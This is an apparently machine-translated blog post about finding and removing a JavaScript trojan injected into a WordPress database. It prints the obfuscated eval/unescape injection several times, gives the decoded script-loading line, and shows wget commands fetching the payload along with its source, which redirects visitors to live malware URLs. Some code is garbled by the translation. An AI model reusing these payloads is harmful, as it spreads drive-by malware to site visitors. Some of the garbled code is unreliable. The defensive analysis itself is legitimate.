Trojan removal and Trojan anatomy

Today, wordpress has been infected with Trojans, which is incredible.
 
The procedure is as follows:
 
When I published an article in the evening, I suddenly thought of a solution for wordpress improvement. The picture/attachment is separated from the web. Of course, this requirement may be rare, because most wordpress will not encounter this problem: insufficient space (directly upgrading the host) and opening attachment downloads seriously affect the access speed of the web (such as html, css, and js.
 
But when I enter the background, I can see that the content box of the quick post is very strange. By default, there is a section of text and js Code below. The latest draft below also shows similar js Code, you may be infected with Trojans. But fortunately, I backed up the entire wordpress database a few days ago in order to try to buy a new vps performance. It seems Lucky.
 
I did not pay attention to it immediately. I wrote down the wp improvement plan, but did not write a few words. I felt uncomfortable. I still don't know how much influence the wp has. So I checked the article casually in the wp background and connected phpmyadmin to view the database. The preliminary evaluation was not serious. I only found that the following JavaScript code was added to the content field of the article, there should be no data loss. This problem is easy to handle and the database can be updated. Before performing the operation, back up the entire database and retain the original "evidence" material. So execute the SQL code that is attached to this article. The problem can be solved. If you don't want to put another wp in the same database, it will also be infected, so you can process the same code. The problem is that other tables in the mysql database have not been carefully checked. After a rough scan, they should not be mounted. Tomorrow, Friday, it's the weekend. Check it over the weekend.
 
The trojan has a vulnerability, but it is not clear where the vulnerability is located. It will be checked again by the weekend.
 
Data backup is very important. To enable the automatic backup mechanism, it is more appropriate to purchase and install it on vps. Vps allows you to easily set scheduled tasks on the server.
 
When I wrote this article, I realized that today's access volume is significantly lower than that of the previous few days. Being Infected with Trojans is also one of the reasons. It is estimated that it is still an important reason. Previously, I thought that all possible target visitors were concerned about the "salt" issue.
This is a JS Trojan. Be careful not to execute it in the browser.
<Script> eval (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 3C % 28% 27% 73% 63% 72% 69% 70% 74% 20% 63% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 68% 6E % 65% 6D % 61% 6E % 69% 75% 74% 65% 6E % 68% 6C % 65% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 22% 3E % 3C % 2F % 73% 63% 72% 69% 70% 74% 3E % 27% 29% 3B ")) </script>
Clear Trojan SQL code
 
Update 'pre _ posts' set 'Post _ content' = replace ('Post _ content ', '<script> eval (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 3C % 28% 27% 73% 63% 72% 69% 70% 74% 20% 72% 63% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 68% 6E % 65% 6D % 61% 6E % 69% 75% 74% 65% 6E % 68% 6C % 65% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 3E % 3C % 2F % 22% 73% 63% 72% 70% 74% 3E % 27% 3B ")) </script> ','')
 
Affected 4045 rows. (The query takes 0.8925 seconds)
 
-----------------------------
 
UPDATE 'pre2 _ posts' SET 'Post _ content' = replace ('Post _ content ', '<script> eval (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 3C % 28% 27% 73% 63% 72% 69% 70% 74% 20% 72% 63% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 68% 6E % 65% 6D % 61% 6E % 69% 75% 74% 65% 6E % 68% 6C % 65% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 3E % 3C % 2F % 22% 73% 63% 72% 70% 74% 3E % 27% 3B ")) </script> ','')
 
Affected 2174 rows. (The query takes 3.1435 seconds)
 
 
 
Discovery of cup again:
 
This Saturday morning, I saw a message in wordpress, "browsing you:" small cup, wordpress has been infected with Trojans/A summary of the cleaning process. "This post automatically jumps to a webpage and downloads several. EXE with 360 scan detected virus, the following is the download information: pcupdate1__2129.exe http://www1.firstok-security.rr.nu/retkko107_2129.php? Xtev4 = nNra76uj2eTZ29CRotz I don't know whether the problem is my browser or what's going on. I used scientific to add chrome ". It seems that when I used the wordpress background to post, it seems that the html code mode is used, rather than the visual editor mode. I directly post the js Trojan Horse. Isn't it a trojan for myself ?! Check the article immediately, and the speed is very slow. To ensure security, disable firefox js while the page is not open (implemented using the js switch plug-in ). Sure enough, the trojan in the html source code is quietly lying down, as if to laugh at me with a grin, cut the entire html immediately, make some modifications, switch to the visual editor and paste it in. The <,> in html is automatically escaped as & lt; and & gt;, so that it will not be executed as js Code by the browser. -- Nonsense -- after the modification, We need to dissect the trojan. This is what we wanted to do when I wrote an article the day before yesterday, but it was already over 12 o'clock late at night.
 
Thanks:
 
-- The above message is sent by "punctuation sign555.blog.51cto.com". Thank you very much !!
 
 
 
Trojan anatomy:
 
This is a JS Trojan. Be careful not to execute it in the browser.
<Script> eval (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 3C % 28% 27% 73% 63% 72% 69% 70% 74% 20% 63% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 68% 6E % 65% 6D % 61% 6E % 69% 75% 74% 65% 6E % 68% 6C % 65% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 22% 3E % 3C % 2F % 73% 63% 72% 69% 70% 74% 3E % 27% 29% 3B ")) </script>
Analysis: this is what you want to do when cleaning Trojans. The trojan itself is a piece of transcoded and js string. During execution, you must first untranscode it to get a string, and then execute the string as a piece of code eval.
 
Create a new. html file with the following content:
 
<Script> document. write (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 28% 3C % 27% 73% 63% 72% 69% 70% 74% 20% 73% 72% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 6E % 68% 6D % 65% 6E % 61% 69% 75% 74% 6E % 65% 6C % 68% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 22% 3E % 3C % 2F % 73% 63% 72% 69% 70% 74% 3E % 27% 29% 3B ")) </script> in chrome, the following message is displayed:

 

It seems that chrome is doing a good job in terms of security and provides warning messages to websites containing malicious code. Analyze whether the code after decoding is still a piece of js, and then download trojans from a website (this mode is generally used for webpage Trojans), document. the code written by write to the page may still be executed. This is not safe, although I have to change the output mode in linux.

 
Use the alert prompt box so that the transcoded string will not be executed. In addition, the alert prompt box in fedora linux can also be copied with the mouse, which is more convenient than the alert message box in windows! The Code is as follows:
 

<Script> alert (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 3C % 28% 27% 73% 63% 72% 69% 70% 74% 20% 63% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 68% 6E % 65% 6D % 61% 6E % 69% 75% 74% 65% 6E % 68% 6C % 65% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 22% 3E % 3C % 2F % 73% 63% 72% 69% 70% 74% 3E % 27% 29% 3B ")) </script>

Be careful. This section is also a Trojan.

Document. write ('<script src = "http://lessthenaminutehandle.com/js.php? Kk = 33 "> </script> ');
The unencoded string is indeed a document. write statement: write a section of js into the html document of the page. This section of js comes from a document from an external site. Here it is still a dynamic file. It seems that there are many trojans on this domain name, passed as a parameter; or? Kk = 33 is only a string used to count the source.
 
Look at what it is. It requires a bit of exploration spirit ~~
 
This time, we cannot use a browser. It is neither secure nor inconvenient. What should we use? Linux terminal command line! Isn't wget the most convenient tool?
 
[Feng @ fsc tmp] $ wget http://lessthenaminutehandle.com/js.php? Kk = 33
[Feng @ fsc tmp] $ cat js. php \? Kk \ = 33
 
Function ssdfsc (cefrvwerfv3rg5e, vbeal, ebtal ){
Var ewefwe = new Date ();
Var vcwc = ewefwe. getDate () + ebtal;
Ewefwe. setDate (vcwc );
Var owc3te = ewefwe. toGMTString ();
Document. cookie = cefrvwerfv3rg5e + "=" + escape (vbeal) + "; expires =" + owc3te;
 
}
 
Function wsdfsdd (cefrvwerfv3rg5e ){
If (document. cookie. indexOf (cefrvwerfv3rg5e + "= ")! =-1) return "1 ";
Return "";
}
 
If (wsdfsdd ("eererfero") = ""){
Ssdfsc ("eererfero", "1", 20 );
Var derverv = "http://www3.personalsecurityrn.rr.nu /? 1dd9536 = m % 2Bzgl2uilqSsld7K0LCYienm1bHco6djpaJgo6xjlYg % 3D ";
 
Window. top. location. replace (derverv );
}
 
I also want to download files from other sites, but I don't know what it is. Let's take a look at the spirit of exploration:
 
Wget-O xxx. js http://www3.personalsecurityrn.rr.nu /? 1dd9536 = m % 2Bzgl2uilqSsld7K0LCYienm1bHco6djpaJgo6xjlYg % 3D
I thought it was another Javascript. The result was an html document. If it was large, it would not be pasted out. See the attachment:
 
Xxx.js.html.zip: The Trojan file is downloaded with caution.
In addition, the previous js request is sent with kk = 33. check whether there are multiple trojans on this site. It is just a statistical parameter.
 
[Feng @ fsc tmp] $ wget http://lessthenaminutehandle.com/js.php? Kk = 32
-- 12:12:06 -- http://lessthenaminutehandle.com/js.php? Kk = 32
Parsing host lessthenaminutehandle.com... 91.193.194.110
Connecting lessthenaminutehandle.com | 91.193.194.110 |: 80... connected.
An HTTP request has been sent and is waiting for response... 200 OK
Length: 573 [text/html]
Saving to: "js. php? Kk = 32"
 
100% [============================================== >] 573 --. -K/s in 0 s
 
12:12:07 (36.2 MB/s)-saved "js. php? Kk = 32 "[1, 573/573])
 
[Feng @ fsc tmp] $ cat js. php \? Kk \ = 32
 
Function ssdfsc (cefrvwerfv3rg5e, vbeal, ebtal ){
Var ewefwe = new Date ();
Var vcwc = ewefwe. getDate () + ebtal;
Ewefwe. setDate (vcwc );
Var owc3te = ewefwe. toGMTString ();
Document. cookie = cefrvwerfv3rg5e + "=" + escape (vbeal) + "; expires =" + owc3te;
 
}
 
Function wsdfsdd (cefrvwerfv3rg5e ){
If (document. cookie. indexOf (cefrvwerfv3rg5e + "= ")! =-1) return "1 ";
Return "";
}
 
If (wsdfsdd ("eererfero") = ""){
Ssdfsc ("eererfero", "1", 20 );
Var derverv = "http://www3.personalsecurityrn.rr.nu /? 1dd9536 = m % 2Bzgl2uilqSsld7K0LCYienm1bHco6djpaJgo6xjlYg % 3D ";
 
Window. top. location. replace (derverv );
}
Like this, it can basically be regarded as a statistical parameter, and the maves will also be able to count where all the horses are scattered. Although these maves are hateful and have no hacker spirit, hackers will be used to sabotage and seek private gains!
 
It seems complicated. It's all about half past twelve. If you don't read it, you can't eat with the spirit of exploration. You're going to eat.
 
Suddenly I think that these so-called hackers also say something similar: "The hacker spirit cannot be used as a meal !" -- This is the most painful thing for the whole of mankind: "eating"
 
 
From http://blog.path8.net/archives/4201.html